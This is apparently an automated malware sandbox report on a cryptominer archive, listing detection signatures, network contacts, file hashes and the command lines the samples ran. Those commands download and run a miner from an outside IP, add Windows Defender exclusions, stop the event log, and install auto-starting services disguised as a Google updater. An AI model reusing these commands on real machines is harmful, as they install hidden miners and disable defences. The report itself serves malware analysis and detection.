Analysis Overview
SHA256
5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c
Threat Level: Likely malicious
The file Miners.zip was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Creates new service(s)
Stops running service(s)
Command and Scripting Interpreter: PowerShell
UPX packed file
Checks BIOS information in registry
Themida packer
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 01:39
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
0s
Max time network
19s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\UAC.exe
"C:\Users\Admin\AppData\Local\Temp\UAC.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://46.102.174.48/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1308,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| ZA | 46.102.174.48:80 | tcp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
Files
memory/2764-0-0x0000000072F4E000-0x0000000072F4F000-memory.dmp
memory/2764-1-0x0000000004EA0000-0x0000000004ED6000-memory.dmp
memory/2764-3-0x0000000072F40000-0x00000000736F0000-memory.dmp
memory/2764-2-0x0000000005550000-0x0000000005B78000-memory.dmp
memory/2764-4-0x0000000072F40000-0x00000000736F0000-memory.dmp
memory/2764-7-0x0000000005E20000-0x0000000005E86000-memory.dmp
memory/2764-17-0x0000000005F90000-0x00000000062E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lb2uovv.cu1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2764-6-0x0000000005DB0000-0x0000000005E16000-memory.dmp
memory/2764-5-0x00000000054B0000-0x00000000054D2000-memory.dmp
memory/2764-18-0x0000000006460000-0x000000000647E000-memory.dmp
memory/2764-19-0x0000000006510000-0x000000000655C000-memory.dmp
memory/2764-41-0x00000000076F0000-0x0000000007793000-memory.dmp
memory/2764-40-0x0000000006A70000-0x0000000006A8E000-memory.dmp
memory/2764-30-0x000000006F830000-0x000000006F87C000-memory.dmp
memory/2764-43-0x00000000077A0000-0x00000000077BA000-memory.dmp
memory/2764-42-0x0000000007E20000-0x000000000849A000-memory.dmp
memory/2764-44-0x0000000007800000-0x000000000780A000-memory.dmp
memory/2764-29-0x0000000006A30000-0x0000000006A62000-memory.dmp
memory/2764-45-0x0000000007A10000-0x0000000007AA6000-memory.dmp
memory/2764-46-0x0000000007990000-0x00000000079A1000-memory.dmp
memory/2764-47-0x00000000079C0000-0x00000000079CE000-memory.dmp
memory/2764-49-0x0000000007AD0000-0x0000000007AEA000-memory.dmp
memory/2764-50-0x0000000007AB0000-0x0000000007AB8000-memory.dmp
memory/2764-48-0x00000000079D0000-0x00000000079E4000-memory.dmp
memory/2764-53-0x0000000072F40000-0x00000000736F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6e440957cb681494b7ad917ecd9616e |
| SHA1 | 0edb2fbd702f145bce506045a8a95800eb0879f1 |
| SHA256 | f4e3c7aa4b570ad8a5d41715de790bb2f84cddc0f84d517aeffafdfce02acfbf |
| SHA512 | d2e5a688a543096662b9759b8f9050909778fbe554ac8e36acc09f2ed7fde9c8f67a23e27c44983a3e75e3dab2fe3cd27da4f55047451571a446a115ea69912c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fbe1aa3f8bdf9d881ee4239f0a312345 |
| SHA1 | d349eddcb4d23cf492e2c2deda377fea30f78322 |
| SHA256 | 7d4348509f354f6485b64c7a8d3b626b30c9e15171e7a07eaa16e5df1c043146 |
| SHA512 | 91f8ed461381d1c1f9896deddb2b7620d9f19eb4cb296e82f6e845e828132f27d0cac7e05190adc71e68b934f744c0841dd981c2dff27a4bd95429dbe76ee415 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
15s
Max time network
31s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\miner.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\miner.exe
"C:\Users\Admin\AppData\Local\Temp\miner.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | randomxmonero.auto.nicehash.com | udp |
| US | 34.149.22.228:443 | randomxmonero.auto.nicehash.com | tcp |
| ZA | 46.102.174.48:80 | tcp | |
| US | 8.8.8.8:53 | 228.22.149.34.in-addr.arpa | udp |
Files
memory/2184-0-0x00007FFB42693000-0x00007FFB42695000-memory.dmp
memory/2184-10-0x000002306B8A0000-0x000002306B8C2000-memory.dmp
memory/2184-11-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
memory/2184-12-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqi4cd1s.quy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2184-15-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
memory/1996-26-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1016-41-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
C:\ProgramData\Google\Chrome\updater.exe
| MD5 | 6c8df1dac309514d1cf281d002cba82e |
| SHA1 | 6278823628b689b8cd1a63ddb75f596c10ad79cc |
| SHA256 | d570edf6be963fa52770bbf968f0adde34ae5ed01533817d9a28a04e9b469458 |
| SHA512 | 333145ee62ab3eebdc992d150e8f8b78a7dabcf2c67da8dda22b083826ac55502c32618a6fe08421e0eab274a4660bb8692343a05d2f0c58882631b502f7ae1b |
memory/1016-40-0x000002F360AA0000-0x000002F360ACB000-memory.dmp
C:\ProgramData\Google\Chrome\updater.exe
| MD5 | 2a6e21645cd671e4d7d4c68611258396 |
| SHA1 | 28be0c90f4730d95f314f2d572823ab32d026458 |
| SHA256 | 7945ece0e2807be03347cf07149ddff5a0f0f8891b8709cf9958072f19001d53 |
| SHA512 | 606d8f0b4b329586d91d3444f614a1595fa46bda03f232d336dcbe9e7656a473ccafd8ee06564b4aa8e00dba507c9ff7b3fc68b61c443c766d62e5711783095f |
memory/612-35-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
memory/612-34-0x0000016316880000-0x00000163168AB000-memory.dmp
memory/664-32-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
memory/612-29-0x00000163167E0000-0x0000016316804000-memory.dmp
memory/4688-320-0x000001A3F2900000-0x000001A3F29B5000-memory.dmp
memory/4688-319-0x000001A3F28E0000-0x000001A3F28FC000-memory.dmp
memory/4688-321-0x000001A3F1C10000-0x000001A3F1C1A000-memory.dmp
memory/4688-322-0x000001A3F2B20000-0x000001A3F2B3C000-memory.dmp
memory/664-31-0x000001E9372F0000-0x000001E93731B000-memory.dmp
memory/4688-323-0x000001A3F2B00000-0x000001A3F2B0A000-memory.dmp
memory/4688-325-0x000001A3F2B10000-0x000001A3F2B18000-memory.dmp
memory/4688-327-0x000001A3F2B50000-0x000001A3F2B5A000-memory.dmp
memory/4688-326-0x000001A3F2B40000-0x000001A3F2B46000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
memory/4688-324-0x000001A3F2B60000-0x000001A3F2B7A000-memory.dmp
memory/1996-23-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp
memory/1996-19-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-18-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-17-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-24-0x00007FFB5F820000-0x00007FFB5F8DE000-memory.dmp
memory/1996-22-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-20-0x0000000140000000-0x000000014002B000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240426-en
Max time kernel
5s
Max time network
20s
Command Line
Signatures
Creates new service(s)
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4536 wrote to memory of 1144 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 4536 wrote to memory of 1144 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CGMNDIHH"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CGMNDIHH"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | de-zephyr.miningocean.org | udp |
| DE | 162.19.241.67:5342 | de-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 67.241.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
Files
memory/4692-10-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4464-13-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-18-0x0000000000560000-0x0000000000580000-memory.dmp
memory/4464-22-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-23-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-21-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-19-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-20-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-17-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-15-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-16-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-14-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-11-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-12-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4692-7-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-6-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-5-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-4-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-3-0x0000000140000000-0x000000014000D000-memory.dmp
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | 226477a027b7fc61f6f1bfab1bb469e3 |
| SHA1 | fd42239a9149e85e113760b0f9a9a713e08a1522 |
| SHA256 | 2eb6619c54344cd103c43430f87df4cb00cb3fb7fdc62b55e2a113a4ddec58ef |
| SHA512 | da29f76f783d9064d6dc16d79557dc4f1ec5d286506c961bbd23b37f1dde1df4ec7f8817aa0aeccc3cc3ff7990b167a6577d5c823ae87548d30c5a0ffd36dd13 |
memory/4464-26-0x00000000005A0000-0x00000000005C0000-memory.dmp
memory/4464-24-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-27-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-29-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-31-0x0000000000FE0000-0x0000000001000000-memory.dmp
memory/4464-32-0x0000000011380000-0x00000000113A0000-memory.dmp
memory/4464-28-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
5s
Max time network
32s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CGMNDIHH"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CGMNDIHH"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | de-zephyr.miningocean.org | udp |
| DE | 162.19.241.67:5342 | de-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 67.241.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
Files
memory/2012-1-0x00007FFDCC4D0000-0x00007FFDCC4D2000-memory.dmp
memory/2012-4-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-3-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-2-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-0-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-6-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | c69337e51b250b87b474867376cdb707 |
| SHA1 | 4642f2eb7dfe64b4f934d9829caf4833647c265c |
| SHA256 | ac095c35dc6e044530c4b9024eb8a6ecea122be06dab5b17c1e5fc04b9d342f8 |
| SHA512 | e8c85717f2d47c69ad74eb884d2cb513c9c2c2842e148b406ce634e2b02dcc637122e31a330345310a88c7f8287b3c47b3cbcd7c6e03a73549563d37b220bb09 |
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | 338cb476917c2fdaced336fd8ba5c4b8 |
| SHA1 | bcc7b4ec89555e7eb9aa1ed4724b00b8f490ac0b |
| SHA256 | e4211f8b50df08971e33139ff338e3914e76d81331aaf2a022795d8c443e2d7d |
| SHA512 | aa88e25df77917a0e22b1688a2814712ae5f8f7250b70032ca59a4ea4999ad111113c4ff310786e2a69d0ed6ca6884d8436b60d8eee62c2e080ee7411165e49c |
memory/1380-10-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp
memory/1380-9-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/2560-21-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1376-24-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-29-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-36-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-32-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-35-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-34-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-33-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-31-0x0000000001130000-0x0000000001150000-memory.dmp
memory/1376-30-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-27-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1380-28-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp
memory/1380-26-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1376-25-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-22-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-23-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1380-13-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1380-12-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/2560-18-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-17-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-16-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-15-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-14-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1380-11-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1376-37-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-39-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-40-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-41-0x0000000140000000-0x0000000140848000-memory.dmp